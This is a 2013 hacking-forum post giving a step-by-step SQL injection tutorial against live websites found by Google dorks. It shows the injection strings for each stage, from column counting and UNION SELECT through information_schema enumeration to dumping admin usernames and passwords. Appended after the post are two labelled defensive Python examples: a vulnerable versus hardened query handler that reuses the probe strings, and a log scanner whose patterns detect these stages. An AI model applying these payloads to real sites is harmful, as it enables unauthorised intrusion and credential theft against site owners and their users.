Pak Cyber Skullz

hack Website using SQL Injection with easy Steps


Post by Admin Tue Dec 24, 2013 4:34 am

✔️ Requirements :-

  • SQL Injection Dorks. [You must be registered and logged in to see this link.]
  • Vulnerable Website. (Use Google to find Vulnerable Website)
  • Firefox with [You must be registered and logged in to see this link.]. [You must be registered and logged in to see this link.]
  • A little understanding of [url=http://hackw0rm.blogspot.in/search/label/SQL Injection]SQL Injection[/url] and URLs
  • Fresh Mind to Understand it.

1. Find Vulnerable website.
      An attacker always uses the [You must be registered and logged in to see this link.], [You must be registered and logged in to see this link.] or [You must be registered and logged in to see this link.] search engine to search for SQL Injection vulnerable websites using Dorks. Dorks with Parameter URL.



  • Search for any one dork on Google. For example, I'm using inurl:index.php?id=

  • Basically, I always use Google to search for vulnerable websites. If you want to hack a particular website, then you have to scan it or manually check every page and URL to identify whether it is vulnerable or not.




Here, for this tutorial, I already have one vulnerable website (but I can't expose its name). In this result you will find thousands of websites. The common thing in this search result is that every website URL has this type of code at its end: inurl:index.php?id=
Yeah, definitely it will, because all these websites have an SQL parameter in their URL. So Google simply found them.



For Eg. [You must be registered and logged in to see this link.]


[center][left]✔️ Find SQLi Vulnerabilities

  • Open any website URL which has an SQL parameter, like the Dorks
  • Put Single Quote at the End of the website URL (')

  • For Eg.: [You must be registered and logged in to see this link.]

  • If the page remains the same or shows Not Found, then it's not vulnerable; if the page shows any type of error related to an SQL string or a MySQL error, then the website is vulnerable to SQLi. For example, I got this error:


    An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1



  • This means the website is vulnerable to SQL Injection. *Cheers*



✔️ Find the number of Columns.



  • Yehfii !! We found an SQL Injection vulnerable website; now it's time to find the no. of columns present in the database.
  • To do that, replace that one single quote ( ' ) with an "Order By no." statement until you find the error message. Change the no. from 1,2,3,4,5,6,7,8,9,..... until you get an error message like "Unknown Column".
  • For example, change its Order By 1,2,3,4 like the example below:

[You must be registered and logged in to see this link.] Order by 1
[You must be registered and logged in to see this link.] Order by 2
[You must be registered and logged in to see this link.] Order by 3



  • And if the above method doesn't work, then use the method below.

[You must be registered and logged in to see this link.] order by 1--
[You must be registered and logged in to see this link.] order by 2--
[You must be registered and logged in to see this link.] order by 3--


If you get an error on Order by 9, that means the DB has 8 columns, and if you found an error on Order by 6, then the DB has 5 columns. I mean, if you put Order by 12 and suppose the DB has only 11 columns, then the website will show an error like this: An error occurred  Unknown column '12' in 'order clause'.


# This trick is actually used to find the number of columns in the DB. Understand the example below and you will get to know.


[center][You must be registered and logged in to see this link.] Order by 1  (No Error)
[You must be registered and logged in to see this link.] Order by 2  (No Error)
[You must be registered and logged in to see this link.] Order by 3  (No Error)
[You must be registered and logged in to see this link.] Order by 4  (No Error)
[You must be registered and logged in to see this link.] Order by 5  (No Error)
[You must be registered and logged in to see this link.] Order by 6    (Error)
.........................Try Until you get an Error..........................

[left]Here, my vulnerable website showed an error on Order by 12, which means my vulnerable website has 11 columns in its DB. So now I have found the number of columns in my DB: Number of Columns = 11


✔️ Find the Vulnerable Column.

  • Basically, if the website is vulnerable then it has a vulnerability in its columns, and now it's time to find out that column. Well, we have successfully discovered the number of columns present in the database. Let us find the vulnerable column by using the query "Union Select columns_sequence". Also change the ID value to negative. I mean, suppose the website has this URL: index.php?id=8. Change it to index.php?id=-8. Just put a minus sign "-" before the ID.
  • For example, if the number of columns is 11, then the query is as follows:


    [center][You must be registered and logged in to see this link.] union select 1,2,3,4,5,6,7,8,9,10,11--


  • And if the above method won't work, then use the method below:


    [You must be registered and logged in to see this link.] and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11--


  • And once the query has been executed, it will display the number of the column.

  • [left][center][You must be registered and logged in to see this link.]


    • In the above result, I found three vulnerable columns: 2, 3 & 4. Let's take 2 for our tutorial. Well! We found the vulnerable columns; now the next step.


    ✔️ Finding version, Database and User.
    Now this time we have to find out the website's database version, user, database name & some other information. Just replace the vulnerable column no. with "version()".

    For Eg. 

    [left][You must be registered and logged in to see this link.] union select 1,version(),3,4,5,6,7,8,9,10,11--


    And now hit Enter and you will get the result.

    [You must be registered and logged in to see this link.]


    Now do the same again: replace the vulnerable column with a different query like database(), user()

    For Eg.

    [center][You must be registered and logged in to see this link.] union select 1,version(),3,4,5,6,7,8,9,10,11--
    [You must be registered and logged in to see this link.] union select 1,database(),3,4,5,6,7,8,9,10,11--
    [You must be registered and logged in to see this link.] union select 1,user(),3,4,5,6,7,8,9,10,11--



    [left]And if the above method won't work, then use the method below:


    [center][You must be registered and logged in to see this link.] and 1=2 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--


    [left]✔️ Finding the Table name.

    • Here we found the vulnerable column, DB version name and user; it's time to get the table name. If the database version is 4 or above then you have to guess the table names (Blind SQL Injection attack)
    • Let us now find the table names of the database. Same here: replace the vulnerable column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()"


    For Eg. 
    [You must be registered and logged in to see this link.] union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--


    Now hit Enter and you can see the complete tables of the database.
    [center]




    [left]Great, we found the table names; now find the table name that is related to admin or user. As you can see in the above image, there is one table name: userDatabase. Let us choose that table, userdatabase, and go on to the next step.

    ✔️ Finding the Column name.

    • Now do the same to find the column names: replace "group_concat(table_name)" with "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"


    • Do not hit Enter now. First of all, convert the table name into Mysql Char String()
    • Install the Hackbar add-on in Firefox [You must be registered and logged in to see this link.]
    • After installing, you can see the toolbar, and if you can't, then hit F9. Select sql->Mysql->MysqlChar() in the Hackbar.


    [center][You must be registered and logged in to see this link.]
    [left]

    • Enter the table name you want to convert into Mysql Char


    [center][You must be registered and logged in to see this link.]

    • Now you can see the Char like this :-

    [You must be registered and logged in to see this link.]

    • Copy and paste the code at the end of the url instead of the "mysqlchar"



    For Eg.
    [You must be registered and logged in to see this link.]-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--


    [left]

    • And now hit Enter and you will be able to see the column names like this:

    [center]

    • Great! Here we found the Username and Password columns.



    ✔️ Explore Database & Hack it.
    Cool! Now you know what the next step is: get the ID and password of the admin user using this command in the URL. Now replace group_concat(column_name) with group_concat(username,0x2a,password), or any other column name you want to get data from.


    For Eg.

    [You must be registered and logged in to see this link.]/index.php?id=-8 and 1=2 union select 1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,11 from userDatabase--


    [left]

    • If the above command doesn't work, then use the column names from the first and put all columns at one time, and you will be able to get the complete database.


    • Now find Admin page using this Method :- [You must be registered and logged in to see this link.]

    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    [/left]
    [/center]
    Admin (Administrator)
    Posts : 279
    Points: : 1423
    Reputation : 15
    Join date : 2013-12-20
    Age : 33
    Location : Washington, District of Columbia

    https://pakcyberskullz.forumotion.com
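
    The probes in the post only work because the page pastes `id` into the SQL text and echoes database errors back to the browser. As an added example (not part of the original post), the sketch below puts that kind of handler beside a hardened one. It uses Python's built-in sqlite3 as a stand-in for MySQL; the `pages` table, its contents and the function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the site's content table (3 columns)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO pages VALUES (8, 'About', 'About us')")
    return db

def page_vulnerable(db, raw_id):
    """The flaw: the request value becomes part of the SQL statement itself."""
    sql = "SELECT id, title, body FROM pages WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the driver error is what makes the quote and ORDER BY probes informative.
        return "An error occurred... " + str(exc)

def page_hardened(db, raw_id):
    """Allow-list the input, bind it as a parameter, never echo database errors."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return "Not found"
    try:
        rows = db.execute(
            "SELECT id, title, body FROM pages WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return "Not found"  # details belong in a server-side log, not the response
    return rows or "Not found"

# Request values in the shapes the post shows, scaled down to a 3-column table.
PROBES = ["8", "8'", "8 order by 3", "8 order by 4", "-8 union select 1,2,3--"]

def compare(db):
    """Map each probe to (vulnerable response, hardened response)."""
    return {p: (page_vulnerable(db, p), page_hardened(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, strong) in compare(make_db()).items():
        print(f"{probe!r:28} vulnerable={weak!r}  hardened={strong!r}")
```

    With the hardened handler every probe other than the plain `8` gets the same generic response, so neither the column count nor the reflected column positions can be inferred from the page.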
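
    On the detection side, the stages in the post leave a recognisable sequence in web server access logs. Added example, not from the original post: a scanner run over constructed log lines (addresses from documentation ranges). The stage names, the sample log and the `min_stages` threshold are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# One pattern per stage of the walkthrough; stage names are made up for this example.
STAGES = {
    "quote_probe": re.compile(r"'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log (combined log format, documentation IP ranges).
T = "[24/Dec/2013:04:40:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {T} "GET /index.php?id=8 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - {T} "GET /search.php?q=select+a+union+rep HTTP/1.1" 200 900',
    f'192.0.2.44 - - {T} "GET /index.php?id=8%27 HTTP/1.1" 200 312',
    f'192.0.2.44 - - {T} "GET /index.php?id=8+order+by+12-- HTTP/1.1" 200 298',
    f'192.0.2.44 - - {T} "GET /index.php?id=-8+union+select+1,2,3-- HTTP/1.1" 200 5300',
    f'192.0.2.44 - - {T} "GET /index.php?id=-8+UNION+SELECT+1,table_name,3+'
    'from+information_schema.tables-- HTTP/1.1" 200 5400',
]

def stages_in(line):
    """Return (client, set of stage names) for one log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qsl undoes %xx and '+' encoding, so the patterns see what the application saw.
    values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    return client, {name for name, rx in STAGES.items() for v in values if rx.search(v)}

def suspects(lines, min_stages=2):
    """Clients whose requests hit at least min_stages distinct stages."""
    seen = {}
    for client, hits in filter(None, map(stages_in, lines)):
        seen.setdefault(client, set()).update(hits)
    return {c: sorted(s) for c, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    print(suspects(SAMPLE_LOG))
```

    A single stage on its own, such as a trailing quote, is common in benign traffic; one client walking through several stages against the same parameter is the signal worth alerting on.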
